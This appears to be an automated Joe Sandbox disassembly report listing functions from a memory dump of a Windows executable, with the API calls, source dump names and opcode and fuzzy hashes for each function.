                                                                                                                      Function 003F89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(00000000), ref: 003F89CE
                                                                                                                      • GetForegroundWindow.USER32 ref: 003F89E5
                                                                                                                      • GetDC.USER32(00000000), ref: 003F8A21
                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 003F8A2D
                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 003F8A68
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4156661090-0
                                                                                                                      • Opcode ID: 341fa190c24467eeaa1ef36fc7c05170d6756fc70b50b6a550ec49c197780acd
                                                                                                                      • Instruction ID: c3b0f442c27c7b645f9933f8babec3a9ef7df9aabf3a4b0a08b14541030febe8
                                                                                                                      • Opcode Fuzzy Hash: 341fa190c24467eeaa1ef36fc7c05170d6756fc70b50b6a550ec49c197780acd
                                                                                                                      • Instruction Fuzzy Hash: 4C219375B00204AFDB15EF65DC89AAABBF5EF48301F048479E94A9B351CF74AD01CBA0
                                                                                                                      Function 003BB58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003BB5EB
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 003BB5FA
                                                                                                                      • BeginPath.GDI32(?), ref: 003BB611
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 003BB63B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3225163088-0
                                                                                                                      • Opcode ID: 18d86a13adaef16ebe645d0494d539ffbaab0c665ed584219eb9cca93e83e9a6
                                                                                                                      • Instruction ID: 68ecd17f9b4c9567d0b3a9042a136f67174ca4d65e4049e198ec378950a44dd5
                                                                                                                      • Opcode Fuzzy Hash: 18d86a13adaef16ebe645d0494d539ffbaab0c665ed584219eb9cca93e83e9a6
                                                                                                                      • Instruction Fuzzy Hash: CB217F70D00348AFDB21AF15DC457E9BBE8FB41319F180137E951935B0E7F548968B5A
                                                                                                                      Function 003C2E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __calloc_crt.LIBCMT ref: 003C2E81
                                                                                                                      • CreateThread.KERNEL32(?,?,003C2FB7,00000000,?,?), ref: 003C2EC5
                                                                                                                      • GetLastError.KERNEL32 ref: 003C2ECF
                                                                                                                      • _free.LIBCMT ref: 003C2ED8
                                                                                                                      • __dosmaperr.LIBCMT ref: 003C2EE3
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2664167353-0
                                                                                                                      • Opcode ID: ea27aedb363b0981b36fc8d19375a4f5a3de0b1146b4a0f188aa0f5e034cedf9
                                                                                                                      • Instruction ID: 9b57f7fae03eb57386cf8fb9e6a6b0947e3b2a0383ef4442cb355294957da818
                                                                                                                      • Opcode Fuzzy Hash: ea27aedb363b0981b36fc8d19375a4f5a3de0b1146b4a0f188aa0f5e034cedf9
                                                                                                                      • Instruction Fuzzy Hash: 41118E32104706AB9722AFA59C41FAB7BA8EF44760B11042DFA14DA191EB319C118B64
                                                                                                                      Function 003DB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003DB903
                                                                                                                      • GetLastError.KERNEL32(?,003DB3CB,?,?,?), ref: 003DB90D
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,003DB3CB,?,?,?), ref: 003DB91C
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,003DB3CB), ref: 003DB923
                                                                                                                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003DB93A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 883493501-0
                                                                                                                      • Opcode ID: edc16fd91f89abf9937df0378d458336fc242baa7bf78fc0bf766f86391f6938
                                                                                                                      • Instruction ID: c19cc6e56758493f6a81011559bf735dd47df48f729ab396d56e8ccac10ba402
                                                                                                                      • Opcode Fuzzy Hash: edc16fd91f89abf9937df0378d458336fc242baa7bf78fc0bf766f86391f6938
                                                                                                                      • Instruction Fuzzy Hash: 02016D71601244BFDB214FA5EC88DAB7BADEF8A764B51002AF945C2250DB718C51DA68
                                                                                                                      Function 003E8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003E8371
                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003E837F
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003E8387
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003E8391
                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003E83CD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2833360925-0
                                                                                                                      • Opcode ID: d635854d50c0317ba6ca3ac87fedd96eb5c6494c87bb8e82f44dea300e6be3a7
                                                                                                                      • Instruction ID: b45ecf2dda04d5181715d801e76900800373f4e7c9d3ab943f6b67c43d8c1c49
                                                                                                                      • Opcode Fuzzy Hash: d635854d50c0317ba6ca3ac87fedd96eb5c6494c87bb8e82f44dea300e6be3a7
                                                                                                                      • Instruction Fuzzy Hash: 2701AD38E00629DBCF00AFE5EC48AEEBB78FB08B01F400251E405B2190CF709560C7A5
                                                                                                                      Function 003DA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CLSIDFromProgID.COMBASE ref: 003DA874
                                                                                                                      • ProgIDFromCLSID.COMBASE(?,00000000), ref: 003DA88F
                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000), ref: 003DA89D
                                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 003DA8AD
                                                                                                                      • CLSIDFromString.COMBASE(?,?), ref: 003DA8B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3897988419-0
                                                                                                                      • Opcode ID: 388ef81c13a5fc06d7a96d34879140f66043f50c4b77e195c0bdb79c104826f4
                                                                                                                      • Instruction ID: 8d8aa7672cfea084967405ad90985330845c983767ccac6eab3957615dc12a05
                                                                                                                      • Opcode Fuzzy Hash: 388ef81c13a5fc06d7a96d34879140f66043f50c4b77e195c0bdb79c104826f4
                                                                                                                      • Instruction Fuzzy Hash: 18012C76A00614ABDB225F54ED44B9ABFEDEB44752F154035BD01D2210D770DD42ABA1
                                                                                                                      Function 003DB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003DB7A5
                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003DB7AF
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003DB7BE
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 003DB7C5
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003DB7DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 47921759-0
                                                                                                                      • Opcode ID: 4e0b313f28216902184a27c8919c9f1d35d3dc890436af769fca9df5d6b93759
                                                                                                                      • Instruction ID: d4c6e7b3bb283b958ee8f77e1762e44c91c6740eb11a1c50895bb1b3942f0421
                                                                                                                      • Opcode Fuzzy Hash: 4e0b313f28216902184a27c8919c9f1d35d3dc890436af769fca9df5d6b93759
                                                                                                                      • Instruction Fuzzy Hash: FEF04F72640205AFEB211FA5EC89EB77BACFF86755F51402AF941C7260DB609C428A60
                                                                                                                      Function 003DB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003DB806
                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003DB810
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003DB81F
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 003DB826
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003DB83C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 47921759-0
                                                                                                                      • Opcode ID: 177a92e508827fe0e70f13d2f168f22bb91e97053aeb3b7fa3b1c4600a44c76a
                                                                                                                      • Instruction ID: ba4b40d43f4c58a062386fc8c2f189df5cb18344c5e7efe059e1551051e8210f
                                                                                                                      • Opcode Fuzzy Hash: 177a92e508827fe0e70f13d2f168f22bb91e97053aeb3b7fa3b1c4600a44c76a
                                                                                                                      • Instruction Fuzzy Hash: 5FF04976600204AFEB221FA5FC88E7B7B6DFF4A755F11002AF941C7260CB609C52DAA0
                                                                                                                      Function 003DFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 003DFA8F
                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 003DFAA6
                                                                                                                      • MessageBeep.USER32(00000000), ref: 003DFABE
                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 003DFADA
                                                                                                                      • EndDialog.USER32(?,00000001), ref: 003DFAF4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3741023627-0
                                                                                                                      • Opcode ID: a468f27237bbc4a35fb2e79680821814394f539548de571d2a64b2daa865a035
                                                                                                                      • Instruction ID: c53d7d576867b5f1ab673ce7fba1b58bb17400d60184f2a00dcd7d31aafebe63
                                                                                                                      • Opcode Fuzzy Hash: a468f27237bbc4a35fb2e79680821814394f539548de571d2a64b2daa865a035
                                                                                                                      • Instruction Fuzzy Hash: 38016D31A00704AFEB369B14ED8EB9677BCBF00B09F44017AB187A55E0DBE4A9858E44
                                                                                                                      Function 003BB517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EndPath.GDI32(?), ref: 003BB526
                                                                                                                      • StrokeAndFillPath.GDI32(?,?,0041F583,00000000,?), ref: 003BB542
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 003BB555
                                                                                                                      • DeleteObject.GDI32 ref: 003BB568
                                                                                                                      • StrokePath.GDI32(?), ref: 003BB583
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2625713937-0
                                                                                                                      • Opcode ID: 6d952dc047b4bff9d90d288f940d4da1eb71f160f4cd78ffa5d8d4f2e99897de
                                                                                                                      • Instruction ID: 102ebb6172b467888a7284c044544c7423e6afcc61794ef008a5d38a26e83ee9
                                                                                                                      • Opcode Fuzzy Hash: 6d952dc047b4bff9d90d288f940d4da1eb71f160f4cd78ffa5d8d4f2e99897de
                                                                                                                      • Instruction Fuzzy Hash: 17F03170500244DFC7366F25EC0C7A43FE4F741326F488225E555454F0D7B0459ADF1A
                                                                                                                      Function 003EFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003EFAB2
                                                                                                                      • CoCreateInstance.COMBASE(0042DA7C,00000000,00000001,0042D8EC,?), ref: 003EFACA
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • CoUninitialize.COMBASE ref: 003EFD2D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2683427295-24824748
                                                                                                                      • Opcode ID: 044b1fda8d7fd4c275d87b0a29a24adea21706c4ae68cf0b7485ea39813dc48e
                                                                                                                      • Instruction ID: bc4bb397b9f04950f00c4f5596aa80cd82b23e38d71e19898d85fef66ed30c0b
                                                                                                                      • Opcode Fuzzy Hash: 044b1fda8d7fd4c275d87b0a29a24adea21706c4ae68cf0b7485ea39813dc48e
                                                                                                                      • Instruction Fuzzy Hash: 17A14C71504205AFD301EF64C891EABB7ECEF99704F404A1DF1559B1A2EB70EA09CBA2
                                                                                                                      Function 003BDA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #$+
                                                                                                                      • API String ID: 0-2552117581
                                                                                                                      • Opcode ID: c73aa81206847c7fb15d1f038f8bc2044034539eb263db0800bc399d42ed8896
                                                                                                                      • Instruction ID: 15638473b0946a998cb18de4ad6c7b935d8da8757c169374b713c3152edc7a64
                                                                                                                      • Opcode Fuzzy Hash: c73aa81206847c7fb15d1f038f8bc2044034539eb263db0800bc399d42ed8896
                                                                                                                      • Instruction Fuzzy Hash: 9351427520424A9FDF16EF68C451AFA7BA4EF9A314F140096FD919B390E7389DC2C728
                                                                                                                      Function 003E503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0043DC40,?,0000000F,0000000C,00000016,0043DC40,?), ref: 003E507B
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                        • Part of subcall function 003AB8A7: _memmove.LIBCMT ref: 003AB8FB
                                                                                                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003E50FB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
